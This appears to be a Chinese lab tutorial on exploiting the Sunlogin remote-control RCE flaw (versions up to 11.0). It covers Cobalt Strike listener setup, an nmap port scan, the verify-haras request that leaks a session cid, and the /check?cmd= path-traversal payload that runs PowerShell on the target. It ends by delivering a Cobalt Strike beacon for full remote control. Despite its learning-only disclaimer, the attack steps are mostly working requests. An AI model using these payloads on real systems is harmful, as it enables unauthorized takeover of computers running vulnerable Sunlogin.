CS学习

  1. 1. 启动攻击机
  2. 2. 配置监听器
  3. 3. 启动靶机上的向日葵
  4. 4. 通过向日葵端口执行命令
    1. 4.1. 获取cid值
    2. 4.2. 执行exp
  5. 5. 执行后门命令

主页

演示一下向日葵rce漏洞,以下内容仅作学习使用,严禁用作网上攻击

向日葵版本≤11.0

服务器/攻击机: 192.168.111.129

建议使用kali,一些工具可以直接使用

靶机: 192.168.111.128

启动攻击机

1
2
3
4
# 先在启动攻击机下的软件
cobaltstrike.bat
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[CSAgent] load translation resource
CS主页

配置监听器

点击Cobalt Strike后,点击展开中的监听器,然后添加,按照123点击

监听器

新建监听器

  1. 监听器名称,随便设置

  2. 服务器/攻击机的ip,也可以服务器和攻击机不同ip

  3. 监听的端口,不能设置和已有端口相同

添加监听器

启动靶机上的向日葵

向日葵

版本需要使用11.0,最新版已修复此漏洞

1
2
3
4
5
6
7
8
# 利用kali中nmap扫描,扫描向日葵所在目标机IP,查看开放端口
nmap 192.168.111.129 -p 40000-65535

# 以下所示,端口49749
Host is up (0.0013s latency).
Not shown: 25535 filtered tcp ports (no-response)
PORT STATE SERVICE
49749/tcp open unknown

通过浏览器访问ip+端口,直到出现如下图所示,出现JSON信息

kali中浏览器截图
1
IP:端口

通过向日葵端口执行命令

获取cid值

可以使用火狐的插件HackBar来注入获取,也可以用burp抓包

尝试获取session,测试靶机是否存在/cgi-bin/rpc界面

/cgi-bin/rpc
1
IP:端口/cgi-bin/rpc
获取cid
1
IP:端口/cgi-bin/rpc?action=verify-haras

得到cid值 dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3,拷贝下来后面需要用到

执行exp

右击打开检查,使用HackBar注入cid值

ipconfig返回值

1
2
3
IP:端口/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20ipconfig

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20(执行的命令)

执行后门命令

通过CS生成后门命令,利用向日葵漏洞执行

选择payload生成器

生成

按照下面顺序,选择上面创建的监听器,格式选择为PowerShell Command,生成的文件保存好

payload

查看生成的文件

生成的文件

复制文件内容后粘贴到浏览器下的HackBar中

替换ipconfig然后点击Execute执行

执行后

返回CS客户端,便可以看到靶机上机

靶机

提权

接下来就可以搞自己想搞的事情了

感谢师傅们的指导